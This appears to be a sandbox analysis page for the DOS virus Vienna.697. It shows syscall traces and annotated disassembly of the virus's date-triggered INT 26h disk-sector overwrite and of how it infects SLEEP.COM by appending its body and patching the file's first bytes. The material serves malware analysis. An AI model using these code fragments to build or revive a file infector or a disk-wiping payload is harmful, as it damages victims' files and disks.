Sample viewer

vx.netlux.org/Virus.DOS.Vienna.697


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:55:12.474615144Z 48 PC: 12a6b | Get DOS version
2018-12-17T22:55:12.47614497Z 47 PC: 12a77 | Get disk transfer address
2018-12-17T22:55:12.477259016Z 26 PC: 12a8a | Set disk transfer address
; Window printed after INT 21h AH=2Ah (Get date) returns at 0x12a9a. It is a
; linear disassembly from the return address, not a record of the path taken.
; Get date returns the month in DH and the day in DL, so this is a date trigger:
; month >= 6 and day >= 22 (0x16) leads to an INT 26h absolute disk write.
2018-12-17T22:55:12.478245523Z 42 PC: 12a9a | Get date 0x12a9a: cmp dh, 6 ; month >= 6 ?
0x12a9d: jge 0x12aa2 ; yes: continue to the day check
0x12a9f: jmp 0x12ac1 ; no: skip the payload entirely
0x12aa1: nop
0x12aa2: mov ah, 0x2a ; AH=2Ah: Get date again
0x12aa4: int 0x21
0x12aa6: cmp dl, 0x16 ; day >= 22 ?
0x12aa9: jge 0x12aae ; yes: fall into the disk write below
0x12aab: jmp 0x12ac1 ; no: skip the payload
0x12aad: nop
0x12aae: mov al, 1 ; INT 26h drive number: 1 = B: (0 would be A:)
0x12ab0: mov cx, 1 ; sector count = 1
0x12ab3: mov dx, 0 ; starting logical sector = 0
0x12ab6: mov ds, word ptr [di + 0x37] ; DS:BX = source buffer, both halves read relative to DI
0x12ab9: mov bx, word ptr [di + 0x63]
0x12abc: int 0x26 ; DOS absolute disk write: bypasses the file system
0x12abe: jmp 0x12ac1
0x12ac0: nop
0x12ac1: pop si ; all three paths rejoin here; SI reloaded from the stack top
0x12ac2: push si ; and left on the stack for later use
; Window printed after the second Get date (the int 0x21 at 0x12aa4) returns at
; 0x12aa6. In the code visible on this page 0x12aa2 is reached only through the
; jge at 0x12a9d, so a second Get date entry suggests the month test passed in this run.
; NOTE(review): no INT 26h entry appears in the syscall table; whether the tracer
; logs non-INT 21h interrupts is not shown, so the table alone does not tell
; whether the disk write below executed.
2018-12-17T22:55:12.481168577Z 42 PC: 12aa6 | Get date 0x12aa6: cmp dl, 0x16 ; day (DL) >= 22 ?
0x12aa9: jge 0x12aae ; yes: fall into the disk write below
0x12aab: jmp 0x12ac1 ; no: skip the payload
0x12aad: nop
0x12aae: mov al, 1 ; INT 26h drive number: 1 = B: (0 would be A:)
0x12ab0: mov cx, 1 ; sector count = 1
0x12ab3: mov dx, 0 ; starting logical sector = 0
0x12ab6: mov ds, word ptr [di + 0x37] ; DS:BX = source buffer, both halves read relative to DI
0x12ab9: mov bx, word ptr [di + 0x63]
0x12abc: int 0x26 ; DOS absolute disk write: bypasses the file system
0x12abe: jmp 0x12ac1
0x12ac0: nop
0x12ac1: pop si ; both paths rejoin here; SI reloaded from the stack top
0x12ac2: push si ; and left on the stack for later use
0x12ac3: add si, 0x34 ; SI -> data at offset 0x34 from that saved base
0x12ac7: lodsb al, byte ptr [si] ; AL = first byte at that offset, SI advances
0x12ac8: mov cx, 0x8000 ; scan limit: 32768 bytes
0x12acb: repne scasb al, byte ptr es:[di] ; scan ES:DI until a byte equals AL or CX runs out
0x12acd: mov cx, 4 ; NOTE(review): looks like 4 more bytes of a short pattern follow - confirm
0x12ad0: lodsb al, byte ptr [si] ; next byte at SI; what ES:DI points at is set outside this window
2018-12-17T22:55:12.483411288Z 78 PC: 12b44 | Find first file
2018-12-17T22:55:12.489286631Z 67 PC: 12b82 | Get or set file attributes
2018-12-17T22:55:12.494709191Z 67 PC: 12b94 | Get or set file attributes
2018-12-17T22:55:12.60035754Z 61 PC: 12b9f | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:55:12.607309944Z 87 PC: 12bab | Get or set file date and time
; Window printed after INT 21h AH=2Ch (Get time) returns at 0x12bb7; linear
; disassembly, not the executed path. It reads the first 3 bytes of the opened
; file, seeks to its end to learn the length, and stores length - 3.
; The syscall table that follows shows a 697-byte write, a seek and a 3-byte
; write on the same handle, which matches a body appended at end-of-file plus
; a rewritten 3-byte file start.
; NOTE(review): the file handle (BX) is presumably set before this window - confirm.
2018-12-17T22:55:12.608633691Z 44 PC: 12bb7 | Get time 0x12bb7: and dh, 7 ; DH = seconds from Get time; keep its low 3 bits
0x12bba: jmp 0x12bbd ; unconditional: the AND result is not tested in this window
0x12bbc: nop
0x12bbd: mov ah, 0x3f ; AH=3Fh: read from file handle
0x12bbf: mov cx, 3 ; 3 bytes
0x12bc2: mov dx, 0x24
0x12bc5: nop
0x12bc6: add dx, si ; DS:DX = buffer at SI + 0x24
0x12bc8: int 0x21
0x12bca: jb 0x12c21 ; CF set = DOS reported an error: bail out
0x12bcc: cmp ax, 3 ; AX = bytes actually read
0x12bcf: jne 0x12c21 ; short read (file under 3 bytes): bail out
0x12bd1: mov ax, 0x4202 ; AH=42h, AL=02h: move file pointer relative to end of file
0x12bd4: mov cx, 0
0x12bd7: mov dx, 0 ; offset CX:DX = 0, so DOS returns the file length in DX:AX
0x12bda: int 0x21
0x12bdc: jb 0x12c21 ; seek failed: bail out
0x12bde: mov cx, ax ; keep the low word of the file length
0x12be0: sub ax, 3
0x12be3: mov word ptr [si + 0x28], ax ; store length - 3 (the rel16 a 3-byte near jmp at offset 0 would need to reach end-of-file)
2018-12-17T22:55:12.612375063Z 63 PC: 12bca | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:55:12.618732976Z 66 PC: 12bdc | Move file pointer
2018-12-17T22:55:12.620054078Z 64 PC: 12c00 | Write file or device (Write 697 bytes on handle 5)
2018-12-17T22:55:12.629918551Z 66 PC: 12c12 | Move file pointer
2018-12-17T22:55:12.631663919Z 64 PC: 12c21 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:55:12.638025885Z 87 PC: 12c34 | Get or set file date and time
2018-12-17T22:55:12.640019676Z 62 PC: 12c38 | Close file
2018-12-17T22:55:12.647304414Z 67 PC: 12c47 | Get or set file attributes
2018-12-17T22:55:12.656828123Z 26 PC: 12c54 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11813,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:31:23.280565605Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:31:23.283524713Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:31:23.286003783Z 26 PC: 12a8a | Set disk transfer address
; Window printed after INT 21h AH=2Ah (Get date) returns at 0x12a9a. It is a
; linear disassembly from the return address, not a record of the path taken.
; Get date returns the month in DH and the day in DL, so this is a date trigger:
; month >= 6 and day >= 22 (0x16) leads to an INT 26h absolute disk write.
2018-12-25T12:31:23.287687571Z 42 PC: 12a9a | Get date 0x12a9a: cmp dh, 6 ; month >= 6 ?
0x12a9d: jge 0x12aa2 ; yes: continue to the day check
0x12a9f: jmp 0x12ac1 ; no: skip the payload entirely
0x12aa1: nop
0x12aa2: mov ah, 0x2a ; AH=2Ah: Get date again
0x12aa4: int 0x21
0x12aa6: cmp dl, 0x16 ; day >= 22 ?
0x12aa9: jge 0x12aae ; yes: fall into the disk write below
0x12aab: jmp 0x12ac1 ; no: skip the payload
0x12aad: nop
0x12aae: mov al, 1 ; INT 26h drive number: 1 = B: (0 would be A:)
0x12ab0: mov cx, 1 ; sector count = 1
0x12ab3: mov dx, 0 ; starting logical sector = 0
0x12ab6: mov ds, word ptr [di + 0x37] ; DS:BX = source buffer, both halves read relative to DI
0x12ab9: mov bx, word ptr [di + 0x63]
0x12abc: int 0x26 ; DOS absolute disk write: bypasses the file system
0x12abe: jmp 0x12ac1
0x12ac0: nop
0x12ac1: pop si ; all three paths rejoin here; SI reloaded from the stack top
0x12ac2: push si ; and left on the stack for later use
2018-12-25T12:31:23.290118471Z 78 PC: 12b44 | Find first file
2018-12-25T12:31:23.297514357Z 67 PC: 12b82 | Get or set file attributes
2018-12-25T12:31:23.303307209Z 67 PC: 12b94 | Get or set file attributes
2018-12-25T12:31:23.322247494Z 61 PC: 12b9f | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:31:23.329397932Z 87 PC: 12bab | Get or set file date and time
; Window printed after INT 21h AH=2Ch (Get time) returns at 0x12bb7; linear
; disassembly, not the executed path. It reads the first 3 bytes of the opened
; file, seeks to its end to learn the length, and stores length - 3.
; The syscall table that follows shows a 697-byte write, a seek and a 3-byte
; write on the same handle, which matches a body appended at end-of-file plus
; a rewritten 3-byte file start.
; NOTE(review): the file handle (BX) is presumably set before this window - confirm.
2018-12-25T12:31:23.331261724Z 44 PC: 12bb7 | Get time 0x12bb7: and dh, 7 ; DH = seconds from Get time; keep its low 3 bits
0x12bba: jmp 0x12bbd ; unconditional: the AND result is not tested in this window
0x12bbc: nop
0x12bbd: mov ah, 0x3f ; AH=3Fh: read from file handle
0x12bbf: mov cx, 3 ; 3 bytes
0x12bc2: mov dx, 0x24
0x12bc5: nop
0x12bc6: add dx, si ; DS:DX = buffer at SI + 0x24
0x12bc8: int 0x21
0x12bca: jb 0x12c21 ; CF set = DOS reported an error: bail out
0x12bcc: cmp ax, 3 ; AX = bytes actually read
0x12bcf: jne 0x12c21 ; short read (file under 3 bytes): bail out
0x12bd1: mov ax, 0x4202 ; AH=42h, AL=02h: move file pointer relative to end of file
0x12bd4: mov cx, 0
0x12bd7: mov dx, 0 ; offset CX:DX = 0, so DOS returns the file length in DX:AX
0x12bda: int 0x21
0x12bdc: jb 0x12c21 ; seek failed: bail out
0x12bde: mov cx, ax ; keep the low word of the file length
0x12be0: sub ax, 3
0x12be3: mov word ptr [si + 0x28], ax ; store length - 3 (the rel16 a 3-byte near jmp at offset 0 would need to reach end-of-file)
2018-12-25T12:31:23.333327231Z 63 PC: 12bca | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:31:23.339349494Z 66 PC: 12bdc | Move file pointer
2018-12-25T12:31:23.342885537Z 64 PC: 12c00 | Write file or device (Write 697 bytes on handle 5)
2018-12-25T12:31:23.35403206Z 66 PC: 12c12 | Move file pointer
2018-12-25T12:31:23.355566797Z 64 PC: 12c21 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:31:23.362607541Z 87 PC: 12c34 | Get or set file date and time
2018-12-25T12:31:23.364352558Z 62 PC: 12c38 | Close file
2018-12-25T12:31:23.371908781Z 67 PC: 12c47 | Get or set file attributes
2018-12-25T12:31:23.382813709Z 26 PC: 12c54 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":6,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11813,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:31:23.26762684Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:31:23.269751672Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:31:23.271850459Z 26 PC: 12a8a | Set disk transfer address
; Window printed after INT 21h AH=2Ah (Get date) returns at 0x12a9a. It is a
; linear disassembly from the return address, not a record of the path taken.
; Get date returns the month in DH and the day in DL, so this is a date trigger:
; month >= 6 and day >= 22 (0x16) leads to an INT 26h absolute disk write.
2018-12-25T12:31:23.273047546Z 42 PC: 12a9a | Get date 0x12a9a: cmp dh, 6 ; month >= 6 ?
0x12a9d: jge 0x12aa2 ; yes: continue to the day check
0x12a9f: jmp 0x12ac1 ; no: skip the payload entirely
0x12aa1: nop
0x12aa2: mov ah, 0x2a ; AH=2Ah: Get date again
0x12aa4: int 0x21
0x12aa6: cmp dl, 0x16 ; day >= 22 ?
0x12aa9: jge 0x12aae ; yes: fall into the disk write below
0x12aab: jmp 0x12ac1 ; no: skip the payload
0x12aad: nop
0x12aae: mov al, 1 ; INT 26h drive number: 1 = B: (0 would be A:)
0x12ab0: mov cx, 1 ; sector count = 1
0x12ab3: mov dx, 0 ; starting logical sector = 0
0x12ab6: mov ds, word ptr [di + 0x37] ; DS:BX = source buffer, both halves read relative to DI
0x12ab9: mov bx, word ptr [di + 0x63]
0x12abc: int 0x26 ; DOS absolute disk write: bypasses the file system
0x12abe: jmp 0x12ac1
0x12ac0: nop
0x12ac1: pop si ; all three paths rejoin here; SI reloaded from the stack top
0x12ac2: push si ; and left on the stack for later use
; Window printed after the second Get date (the int 0x21 at 0x12aa4) returns at
; 0x12aa6. In the code visible on this page 0x12aa2 is reached only through the
; jge at 0x12a9d, so a second Get date entry suggests the month test passed in this run.
; NOTE(review): no INT 26h entry appears in the syscall table; whether the tracer
; logs non-INT 21h interrupts is not shown, so the table alone does not tell
; whether the disk write below executed.
2018-12-25T12:31:23.275346199Z 42 PC: 12aa6 | Get date 0x12aa6: cmp dl, 0x16 ; day (DL) >= 22 ?
0x12aa9: jge 0x12aae ; yes: fall into the disk write below
0x12aab: jmp 0x12ac1 ; no: skip the payload
0x12aad: nop
0x12aae: mov al, 1 ; INT 26h drive number: 1 = B: (0 would be A:)
0x12ab0: mov cx, 1 ; sector count = 1
0x12ab3: mov dx, 0 ; starting logical sector = 0
0x12ab6: mov ds, word ptr [di + 0x37] ; DS:BX = source buffer, both halves read relative to DI
0x12ab9: mov bx, word ptr [di + 0x63]
0x12abc: int 0x26 ; DOS absolute disk write: bypasses the file system
0x12abe: jmp 0x12ac1
0x12ac0: nop
0x12ac1: pop si ; both paths rejoin here; SI reloaded from the stack top
0x12ac2: push si ; and left on the stack for later use
0x12ac3: add si, 0x34 ; SI -> data at offset 0x34 from that saved base
0x12ac7: lodsb al, byte ptr [si] ; AL = first byte at that offset, SI advances
0x12ac8: mov cx, 0x8000 ; scan limit: 32768 bytes
0x12acb: repne scasb al, byte ptr es:[di] ; scan ES:DI until a byte equals AL or CX runs out
0x12acd: mov cx, 4 ; NOTE(review): looks like 4 more bytes of a short pattern follow - confirm
0x12ad0: lodsb al, byte ptr [si] ; next byte at SI; what ES:DI points at is set outside this window
2018-12-25T12:31:23.278251174Z 78 PC: 12b44 | Find first file
2018-12-25T12:31:23.287026408Z 67 PC: 12b82 | Get or set file attributes
2018-12-25T12:31:23.293336648Z 67 PC: 12b94 | Get or set file attributes
2018-12-25T12:31:23.311267292Z 61 PC: 12b9f | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:31:23.319877811Z 87 PC: 12bab | Get or set file date and time
; Window printed after INT 21h AH=2Ch (Get time) returns at 0x12bb7; linear
; disassembly, not the executed path. It reads the first 3 bytes of the opened
; file, seeks to its end to learn the length, and stores length - 3.
; The syscall table that follows shows a 697-byte write, a seek and a 3-byte
; write on the same handle, which matches a body appended at end-of-file plus
; a rewritten 3-byte file start.
; NOTE(review): the file handle (BX) is presumably set before this window - confirm.
2018-12-25T12:31:23.3218261Z 44 PC: 12bb7 | Get time 0x12bb7: and dh, 7 ; DH = seconds from Get time; keep its low 3 bits
0x12bba: jmp 0x12bbd ; unconditional: the AND result is not tested in this window
0x12bbc: nop
0x12bbd: mov ah, 0x3f ; AH=3Fh: read from file handle
0x12bbf: mov cx, 3 ; 3 bytes
0x12bc2: mov dx, 0x24
0x12bc5: nop
0x12bc6: add dx, si ; DS:DX = buffer at SI + 0x24
0x12bc8: int 0x21
0x12bca: jb 0x12c21 ; CF set = DOS reported an error: bail out
0x12bcc: cmp ax, 3 ; AX = bytes actually read
0x12bcf: jne 0x12c21 ; short read (file under 3 bytes): bail out
0x12bd1: mov ax, 0x4202 ; AH=42h, AL=02h: move file pointer relative to end of file
0x12bd4: mov cx, 0
0x12bd7: mov dx, 0 ; offset CX:DX = 0, so DOS returns the file length in DX:AX
0x12bda: int 0x21
0x12bdc: jb 0x12c21 ; seek failed: bail out
0x12bde: mov cx, ax ; keep the low word of the file length
0x12be0: sub ax, 3
0x12be3: mov word ptr [si + 0x28], ax ; store length - 3 (the rel16 a 3-byte near jmp at offset 0 would need to reach end-of-file)
2018-12-25T12:31:23.32534108Z 63 PC: 12bca | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:31:23.332779857Z 66 PC: 12bdc | Move file pointer
2018-12-25T12:31:23.334350824Z 64 PC: 12c00 | Write file or device (Write 697 bytes on handle 5)
2018-12-25T12:31:23.344790139Z 66 PC: 12c12 | Move file pointer
2018-12-25T12:31:23.346651292Z 64 PC: 12c21 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:31:23.353998029Z 87 PC: 12c34 | Get or set file date and time
2018-12-25T12:31:23.356019207Z 62 PC: 12c38 | Close file
2018-12-25T12:31:23.365615992Z 67 PC: 12c47 | Get or set file attributes
2018-12-25T12:31:23.378703866Z 26 PC: 12c54 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11813,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:31:23.305144832Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:31:23.306965698Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:31:23.308392369Z 26 PC: 12a8a | Set disk transfer address
; Window printed after INT 21h AH=2Ah (Get date) returns at 0x12a9a. It is a
; linear disassembly from the return address, not a record of the path taken.
; Get date returns the month in DH and the day in DL, so this is a date trigger:
; month >= 6 and day >= 22 (0x16) leads to an INT 26h absolute disk write.
2018-12-25T12:31:23.30974825Z 42 PC: 12a9a | Get date 0x12a9a: cmp dh, 6 ; month >= 6 ?
0x12a9d: jge 0x12aa2 ; yes: continue to the day check
0x12a9f: jmp 0x12ac1 ; no: skip the payload entirely
0x12aa1: nop
0x12aa2: mov ah, 0x2a ; AH=2Ah: Get date again
0x12aa4: int 0x21
0x12aa6: cmp dl, 0x16 ; day >= 22 ?
0x12aa9: jge 0x12aae ; yes: fall into the disk write below
0x12aab: jmp 0x12ac1 ; no: skip the payload
0x12aad: nop
0x12aae: mov al, 1 ; INT 26h drive number: 1 = B: (0 would be A:)
0x12ab0: mov cx, 1 ; sector count = 1
0x12ab3: mov dx, 0 ; starting logical sector = 0
0x12ab6: mov ds, word ptr [di + 0x37] ; DS:BX = source buffer, both halves read relative to DI
0x12ab9: mov bx, word ptr [di + 0x63]
0x12abc: int 0x26 ; DOS absolute disk write: bypasses the file system
0x12abe: jmp 0x12ac1
0x12ac0: nop
0x12ac1: pop si ; all three paths rejoin here; SI reloaded from the stack top
0x12ac2: push si ; and left on the stack for later use
2018-12-25T12:31:23.31311675Z 78 PC: 12b44 | Find first file
2018-12-25T12:31:23.319726307Z 67 PC: 12b82 | Get or set file attributes
2018-12-25T12:31:23.325591433Z 67 PC: 12b94 | Get or set file attributes
2018-12-25T12:31:23.35537938Z 61 PC: 12b9f | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:31:23.363096378Z 87 PC: 12bab | Get or set file date and time
; Window printed after INT 21h AH=2Ch (Get time) returns at 0x12bb7; linear
; disassembly, not the executed path. It reads the first 3 bytes of the opened
; file, seeks to its end to learn the length, and stores length - 3.
; The syscall table that follows shows a 697-byte write, a seek and a 3-byte
; write on the same handle, which matches a body appended at end-of-file plus
; a rewritten 3-byte file start.
; NOTE(review): the file handle (BX) is presumably set before this window - confirm.
2018-12-25T12:31:23.3646939Z 44 PC: 12bb7 | Get time 0x12bb7: and dh, 7 ; DH = seconds from Get time; keep its low 3 bits
0x12bba: jmp 0x12bbd ; unconditional: the AND result is not tested in this window
0x12bbc: nop
0x12bbd: mov ah, 0x3f ; AH=3Fh: read from file handle
0x12bbf: mov cx, 3 ; 3 bytes
0x12bc2: mov dx, 0x24
0x12bc5: nop
0x12bc6: add dx, si ; DS:DX = buffer at SI + 0x24
0x12bc8: int 0x21
0x12bca: jb 0x12c21 ; CF set = DOS reported an error: bail out
0x12bcc: cmp ax, 3 ; AX = bytes actually read
0x12bcf: jne 0x12c21 ; short read (file under 3 bytes): bail out
0x12bd1: mov ax, 0x4202 ; AH=42h, AL=02h: move file pointer relative to end of file
0x12bd4: mov cx, 0
0x12bd7: mov dx, 0 ; offset CX:DX = 0, so DOS returns the file length in DX:AX
0x12bda: int 0x21
0x12bdc: jb 0x12c21 ; seek failed: bail out
0x12bde: mov cx, ax ; keep the low word of the file length
0x12be0: sub ax, 3
0x12be3: mov word ptr [si + 0x28], ax ; store length - 3 (the rel16 a 3-byte near jmp at offset 0 would need to reach end-of-file)
2018-12-25T12:31:23.367493136Z 63 PC: 12bca | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:31:23.378954994Z 66 PC: 12bdc | Move file pointer
2018-12-25T12:31:23.380719364Z 64 PC: 12c00 | Write file or device (Write 697 bytes on handle 5)
2018-12-25T12:31:23.38974658Z 66 PC: 12c12 | Move file pointer
2018-12-25T12:31:23.392234312Z 64 PC: 12c21 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:31:23.399230722Z 87 PC: 12c34 | Get or set file date and time
2018-12-25T12:31:23.40065291Z 62 PC: 12c38 | Close file
2018-12-25T12:31:23.409280753Z 67 PC: 12c47 | Get or set file attributes
2018-12-25T12:31:23.419826164Z 26 PC: 12c54 | Set disk transfer address

{"DateBased":true,"Day":22,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11813,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:31:23.38941276Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:31:23.392424611Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:31:23.394117896Z 26 PC: 12a8a | Set disk transfer address
; Window printed after INT 21h AH=2Ah (Get date) returns at 0x12a9a. It is a
; linear disassembly from the return address, not a record of the path taken.
; Get date returns the month in DH and the day in DL, so this is a date trigger:
; month >= 6 and day >= 22 (0x16) leads to an INT 26h absolute disk write.
2018-12-25T12:31:23.398085163Z 42 PC: 12a9a | Get date 0x12a9a: cmp dh, 6 ; month >= 6 ?
0x12a9d: jge 0x12aa2 ; yes: continue to the day check
0x12a9f: jmp 0x12ac1 ; no: skip the payload entirely
0x12aa1: nop
0x12aa2: mov ah, 0x2a ; AH=2Ah: Get date again
0x12aa4: int 0x21
0x12aa6: cmp dl, 0x16 ; day >= 22 ?
0x12aa9: jge 0x12aae ; yes: fall into the disk write below
0x12aab: jmp 0x12ac1 ; no: skip the payload
0x12aad: nop
0x12aae: mov al, 1 ; INT 26h drive number: 1 = B: (0 would be A:)
0x12ab0: mov cx, 1 ; sector count = 1
0x12ab3: mov dx, 0 ; starting logical sector = 0
0x12ab6: mov ds, word ptr [di + 0x37] ; DS:BX = source buffer, both halves read relative to DI
0x12ab9: mov bx, word ptr [di + 0x63]
0x12abc: int 0x26 ; DOS absolute disk write: bypasses the file system
0x12abe: jmp 0x12ac1
0x12ac0: nop
0x12ac1: pop si ; all three paths rejoin here; SI reloaded from the stack top
0x12ac2: push si ; and left on the stack for later use
2018-12-25T12:31:23.401298606Z 78 PC: 12b44 | Find first file
2018-12-25T12:31:23.409252933Z 67 PC: 12b82 | Get or set file attributes
2018-12-25T12:31:23.416131163Z 67 PC: 12b94 | Get or set file attributes
2018-12-25T12:31:23.434152589Z 61 PC: 12b9f | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:31:23.442887742Z 87 PC: 12bab | Get or set file date and time
; Window printed after INT 21h AH=2Ch (Get time) returns at 0x12bb7; linear
; disassembly, not the executed path. It reads the first 3 bytes of the opened
; file, seeks to its end to learn the length, and stores length - 3.
; The syscall table that follows shows a 697-byte write, a seek and a 3-byte
; write on the same handle, which matches a body appended at end-of-file plus
; a rewritten 3-byte file start.
; NOTE(review): the file handle (BX) is presumably set before this window - confirm.
2018-12-25T12:31:23.444581795Z 44 PC: 12bb7 | Get time 0x12bb7: and dh, 7 ; DH = seconds from Get time; keep its low 3 bits
0x12bba: jmp 0x12bbd ; unconditional: the AND result is not tested in this window
0x12bbc: nop
0x12bbd: mov ah, 0x3f ; AH=3Fh: read from file handle
0x12bbf: mov cx, 3 ; 3 bytes
0x12bc2: mov dx, 0x24
0x12bc5: nop
0x12bc6: add dx, si ; DS:DX = buffer at SI + 0x24
0x12bc8: int 0x21
0x12bca: jb 0x12c21 ; CF set = DOS reported an error: bail out
0x12bcc: cmp ax, 3 ; AX = bytes actually read
0x12bcf: jne 0x12c21 ; short read (file under 3 bytes): bail out
0x12bd1: mov ax, 0x4202 ; AH=42h, AL=02h: move file pointer relative to end of file
0x12bd4: mov cx, 0
0x12bd7: mov dx, 0 ; offset CX:DX = 0, so DOS returns the file length in DX:AX
0x12bda: int 0x21
0x12bdc: jb 0x12c21 ; seek failed: bail out
0x12bde: mov cx, ax ; keep the low word of the file length
0x12be0: sub ax, 3
0x12be3: mov word ptr [si + 0x28], ax ; store length - 3 (the rel16 a 3-byte near jmp at offset 0 would need to reach end-of-file)
2018-12-25T12:31:23.447580971Z 63 PC: 12bca | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:31:23.456425356Z 66 PC: 12bdc | Move file pointer
2018-12-25T12:31:23.458611586Z 64 PC: 12c00 | Write file or device (Write 697 bytes on handle 5)
2018-12-25T12:31:23.468644111Z 66 PC: 12c12 | Move file pointer
2018-12-25T12:31:23.471856696Z 64 PC: 12c21 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:31:23.479718876Z 87 PC: 12c34 | Get or set file date and time
2018-12-25T12:31:23.481400761Z 62 PC: 12c38 | Close file
2018-12-25T12:31:23.49094523Z 67 PC: 12c47 | Get or set file attributes
2018-12-25T12:31:23.503849761Z 26 PC: 12c54 | Set disk transfer address